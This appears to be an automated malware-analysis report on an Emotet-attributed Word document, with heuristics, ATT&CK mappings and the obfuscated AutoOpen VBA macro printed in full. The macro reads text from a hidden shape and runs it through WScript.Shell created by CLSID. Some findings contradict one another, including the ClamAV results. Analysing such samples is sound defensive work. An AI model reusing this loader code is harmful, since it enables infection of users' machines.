Verdict: MALICIOUS
Risk Score: 252
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
The sample contains VBA macros with an AutoOpen function, which is a common technique for Emotet. The macros instantiate the dangerous COM class WScript.Shell and reference PowerShell, indicating an attempt to download and execute a second-stage payload. ClamAV detection further supports the Emotet family attribution.
Heuristics (9)
- ClamAV: Doc.Downloader.Emotet-6826446-0 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6826446-0
- VBA macros detected [medium] (OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID [critical] (OLE_VBA_GETOBJECT_CLSID_DANGEROUS): VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on.
  Matched line in script: End Select / Set lWpSaF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + MRCEVif + cfWwP + fCBpsz + nPYLbD) / On Error Resume Next
- GetObject call [high] (OLE_VBA_GETOBJ): GetObject call
  Matched line in script: End Select / Set lWpSaF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + MRCEVif + cfWwP + fCBpsz + nPYLbD) / On Error Resume Next
- AutoOpen macro [low] (OLE_VBA_AUTOOPEN): AutoOpen macro
  Matched line in script: Attribute VB_Customizable = True / Sub AutoOpen() / On Error Resume Next
- Reference to PowerShell [high] (SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5001 bytes |

SHA-256: 91524fbfb3a552d96b10feec9f1abe40069d4b908c784baa9e8fd0e0a6770cd4

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 112 of 173 identifiers look randomly generated (e.g. 'NhQLQfwlaBSJn'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "iHOBqSAldadB"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case rssVuadT
Case 7431461
bcPiiiK = CBool(GnVMX)
cRvtrcHL = 131039611
HudsIUj = CBool(OwOPq)
Case 145014689
BzKzRTiVD = CBool(cfjcYRPIp)
oFRvlHM = Atn(aaMbZupdz)
CGcYaz = CBool(pzhpfwHB)
KwhOMKHju = Atn(190796375 * CLng(217435300))
End Select
Set pmuUB = Shapes("NhQLQfwlaBSJn")
On Error Resume Next
Select Case bGtwlAO
Case 234272584
lhAlL = CBool(kNliC)
jobhj = 241503370
WYjvpCIBA = CBool(ZwnjvJjNM)
Case 36830349
rKNWZVuRS = CBool(BPXMdF)
LjCAjPLi = Atn(XlfrUX)
sfNTZQj = CBool(jijXjP)
SEwCdCz = Atn(50389999 * CLng(309798784))
End Select
WzKifFWORWi = "" + fhPmMvC + wJmaw + AjoBzA + tRtcuXS + pmuUB.TextFrame.TextRange.Text + pDSlHaO + GiEzIkt + jikIk + LNmKz + UbpTkTsw
On Error Resume Next
Select Case rHYfT
Case 283156215
mTlapsdw = CBool(KazuGNRok)
nCYvz = 268195053
EStiwcZo = CBool(widBQn)
Case 149083892
CoLEvipj = CBool(KDkOXolGn)
CONwYF = Atn(RnLisAfss)
diIoE = CBool(CSWEBYqru)
cURpqnw = Atn(29794688 * CLng(83148233))
End Select
On Error Resume Next
Select Case tiWhQtm
Case 116477639
jIKwtM = CBool(BCtmQBzm)
ClrtdmQh = 210593100
YHjzTfP = CBool(FTsaaEK)
Case 136987834
wdNsijzOH = CBool(YltrcSUnc)
FZHBWtT = Atn(bLmjJwUES)
qXiiMkrs = CBool(bPIFQh)
kWWMVoQGm = Atn(317801614 * CLng(56140133))
End Select
Set lWpSaF = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + MRCEVif + cfWwP + fCBpsz + nPYLbD)
On Error Resume Next
Select Case zNrwwL
Case 68721804
otcqjXQU = CBool(BWjFsCc)
cTNEtvM = 151166701
XijmhD = CBool(dwwhnrN)
Case 159090100
JZjJMFKP = CBool(TrwcuzP)
PzhkkU = Atn(GbvEvl)
GpRkWfND = CBool(YTMNLd)
BBRTb = Atn(87935855 * CLng(282064522))
End Select
On Error Resume Next
Select Case hpIwX
Case 110413520
pGmSwRUXM = CBool(NHfBvFU)
TDjMDT = 6529678
MPllw = CBool(FftuXj)
Case 263227701
AuFPMS = CBool(DmkohDN)
dDTRvF = Atn(maiwC)
IAhnd = CBool(CpGoG)
aIdAzPMr = Atn(101102913 * CLng(106969043))
End Select
Const RmcCa = 0
On Error Resume Next
Select Case pmaMFKnK
Case 293360880
jcDLa = CBool(HjiXiGm)
ZMmTZDZz = 126278805
kSBEvQL = CBool(CzPLrC)
Case 85041545
OcZUCiz = CBool(nsXUlociJ)
bHXDkOM = Atn(EpSNUk)
wpzYw = CBool(CTJRDsq)
NUhCRaF = Atn(22526869 * CLng(74229139))
End Select
On Error Resume Next
Select Case ZWprZjMP
Case 211837363
kAwHZJPD = CBool(WXsHuwKTz)
YrRAahHlD = 193622773
GuMRjLSJk = CBool(uOIBI)
Case 216439552
vsONPW = CBool(qSzYZ)
YMatQd = Atn(qOmsJMki)
JzSAspK = CBool(jrYEaN)
tkRkio = Atn(92914447 * CLng(244321475))
End Select
On Error Resume Next
Select Case RZbIIz
Case 172545123
fPdiTNI = CBool(UtuvVBKNz)
BflPU = 213595769
siCSP = CBool(nrZPIL)
Case 17009969
jwtYK = CBool(MuPONKBz)
tPuwbaiGi = Atn(aGEvm)
CvzVi = CBool(rKuuwPnEE)
qwjzNO = Atn(176355816 * CLng(228591513))
End Select
On Error Resume Next
Select Case NjfbdM
Case 300889489
dXqSa = CBool(wjpZYv)
ETZALmtb = 221284423
jLzCYjLKa = CBool(HtVlFzA)
Case 266104435
wAUuWI = CBool(FbRazf)
fJHdMaAiP = Atn(UhKzouLlF)
lrLRat = CBool(iksza)
zqbwWnO = Atn(102803920 * CLng(121113587))
End Select
On Error Resume Next
Select Case TASoZLpmA
Case 259174217
pOUcNrUa = CBool(VJBcfuAPt)
bfNUjKiGF = 301322238
CokWtdL = CBool(OwuObVK)
Case 336269912
JiKatELIc = CBool(kSflPjYSU)
FlRplf = Atn(hRlwZKswa)
zJjZORjb = CBool(iNiiDC)
ijXNVpOIi = Atn(284168830 * CLng(281235694))
End Select
lWpSaF.Run# WzKifFWORWi, RmcCa
On Error Resume Next
Select Case SwXPMw
Case 264960689
WvcDizt = CBool(cklritc)
ialXMJWUH = 298761793
XZTvEiIl = CBool(dIwvdO)
Case 311931377
sMmYUclm = CBool(QQNYI)
pRWFJpjJW = Atn(QRWiq)
zNkbuHHDw = CBool(JuRsXnVM)
dHJmw = Atn(79740558 * CLng(21389483))
End Select
On Error Resume Next
Select Case YOYjilLEj
Case 107707173
DYshJzQXc = CBool(oknNw)
EjoWcuC = 301418533
QLCKdIVWT = CBool(juVTKCz)
Case 131585393
jilSkLHU = CBool(uOIWwotmO)
wATOTk = Atn(fiPdTf)
RJOisSz = CBool(oabFTMw)
aYokVkQQ = Atn(121684110 * CLng(224527147))
End Select
End Sub